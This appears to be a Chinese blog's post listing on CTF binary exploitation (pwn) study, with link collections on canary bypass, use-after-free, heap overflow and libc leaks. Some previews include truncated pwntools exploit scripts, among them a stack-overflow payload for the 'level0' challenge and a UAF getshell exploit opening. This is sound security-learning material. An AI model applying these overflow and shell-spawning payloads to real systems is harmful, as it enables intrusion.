- 博客(35)
- 收藏
- 关注
原创 绕过Canary与Canary的泄露
Canary学习(泄露Canary):https://blog.csdn.net/acsuccess/article/details/104115114泄露canary:https://blog.csdn.net/qq_38204481/article/details/81076850
2020-12-24 14:02:07 250
原创 uaf漏洞利用、use after free
UAF学习–原理及利用:https://www.cnblogs.com/alert123/p/4918041.html
2020-12-24 13:06:28 287
原创 攻防世界level0机器码形式payload
第一次写出了机器码payload哈哈哈from pwn import *context.log_level='debug'#r=remote('220.249.52.134',53019)r=process('./level0')system_call=0x400596ret_addr=0x400431#payload='A'*0x80+'B'*0x8+p64(ret_addr)+p64(system_call)payload='\x65\x65\x65\x65\x65\x65\x65\x6
2020-12-23 17:35:36 170
原创 2020XCTF华为云专场pwn题WP
PwnCPP解题思路题⽬存在uaf,结合堆⻛⽔getshell#!/usr/bin/python#coding:utf-8from pwn import *context.log_level='debug'#io=process("./chall",env={"LD_PRELOAD":"./libc-2.31.so"})io=remote('124.70.12.210', 10002)libc=ELF("./libc-2.31.so")sla=lambda a : io.sendlin
2020-12-23 16:53:19 444
原创 堆溢出资料汇总
新手科普 | CTF PWN堆溢出总结:https://www.freebuf.com/articles/system/171261.htmli春秋:https://www.ichunqiu.com/course/57507
2020-12-22 18:19:24 148
原创 fuzz黑盒测试
语雀:warmup (fuzz:黑盒测试)https://www.yuque.com/chenguangzhongdeyimoxiao/xx6p74/tdx0mi
2020-12-21 21:53:38 1330
原创 puts函数泄露地址
CTF中的PWN——绕CANARY防护3(选择项+PUTS带出CANARY+泄露函数地址计算基地址):https://www.freesion.com/article/5901691025/利用puts函数泄露libc内存信息:https://www.it610.com/article/1296102748638486528.htm
2020-12-17 20:58:50 939
原创 编写EXP时需要用到的相对路径和绝对路径表示法
“.” – 表示当前目录,相对路径。“…” – 代表上一层目录,相对路径。“…/…/” – 上一层目录的上一层目录,相对路径。“/” – 根目录,绝对路径。“D:/New folder/” – 物理路径,绝对路径。符号“.”来表示当前目录,用符号“…”来表示当前目录的父(上一层)目录,这是绝对路径和相对路径最基础的知识,记录一下,备忘。...
2020-12-17 20:39:24 217
原创 如何找到ELF程序对应的libc版本问题
参考链接:https://qastack.cn/ubuntu/163138/how-do-i-find-what-version-of-libc-my-application-links-to
2020-12-17 19:51:20 863
原创 函数调用约定cdecl、stdcall、fastcall、naked call、pascal的区别
CTF wiki C语言函数调用栈(二):https://www.cnblogs.com/clover-toeic/p/3756668.html
2020-12-16 23:15:46 148
原创 栈溢出原理和绕过技术 | NX、CANARY、ASLR、RELRO
GitHub:https://github.com/ylcangel/binary_vulnerability/
2020-12-16 18:21:46 812
原创 构造虚假栈帧 | 花式栈溢出
花式栈溢出技巧----stack pivoting/frame faking:https://blog.csdn.net/qq_42192672/article/details/83039125
2020-12-15 13:31:38 167
原创 各网站pwn学习资料大全
语雀:https://www.yuque.com/u239977/cbzkn3/xz7eczhttps://www.yuque.com/hxfqg9/bin/hg3qehCTF wiki:https://wiki.x10sec.org/i春秋CTF入门:https://www.cnblogs.com/ichunqiu/p/11583552.html
2020-12-15 13:01:34 649
原创 IDA pro分析(静态分析+动态调试)
IDA Pro使用(静态分析+动态调试):https://www.cnblogs.com/blacksunny/p/7199572.html
2020-12-13 10:37:14 463
原创 i春秋教程之shellcode
CTF必备技能丨Linux Pwn入门教程——ShellCodehttps://www.cnblogs.com/ichunqiu/p/11162515.html
2020-12-11 18:02:46 193
原创 Canary以及Canary绕过技巧
canary介绍与绕过技巧:https://blog.csdn.net/weixin_43713800/article/details/105273284
2020-12-11 12:00:14 303
原创 Canary保护绕过 | 攻防世界PWN高手区Mary_Morton | rabin2 -I命令
https://www.jianshu.com/p/c8a641ca1880
2020-12-09 16:04:11 504
原创 ROARCTF部分WP
链接:https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485804&idx=1&sn=15b8b99fc9cdca98d5fa99484b776063&chksm=fd711c21ca0695374a191994b75b563b1a7604b70aa3c0b0251e78721f5a24de8ff85f85284f&mpshare=1&scene=23&srcid=1207vysHlx
2020-12-08 11:05:57 293 1
原创 攻防世界pwn新手村WP
攻防世界一、level0思路1from pwn import *context.log_level='debug'r=remote('220.249.52.133',30689)system_addr=0x400596payload='A'*0x80+'B'*0x8+p64(0x400431)+p64(system_addr)r.recvuntil('\n')r.sendline(payload)r.interactive()思路2from pwn import *context
2020-12-07 11:17:41 181
原创 有无libc和函数的泄露
CTF-pwn 地址泄露总结:https://blog.csdn.net/P01yH3dr0n/article/details/103729452
2020-12-05 09:38:29 128
原创 Ubuntu安装docker容器并使用教程
参考链接https://blog.csdn.net/fei2636/article/details/79384969
2020-12-03 20:50:37 421
原创 LibcSearcher的使用
BUUCTF ciscn_2019_c_1from pwn import *from LibcSearcher import *context.os='linux'context.arch='amd64'context.log_level='debug'ru=lambda x:io.recvuntil(x)rl=lambda :io.recvline()sla=lambda x,y:io.sendlineafter(x,y)io=remote('xxx',xxx)elf=ELF('
2020-12-03 19:20:39 1337
原创 解决Github上下载速度慢的问题
方法:在github.com后面添加cnpmjs.orggit clone https://github.com.cnpmjs.org/…
2020-12-03 19:03:19 148
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人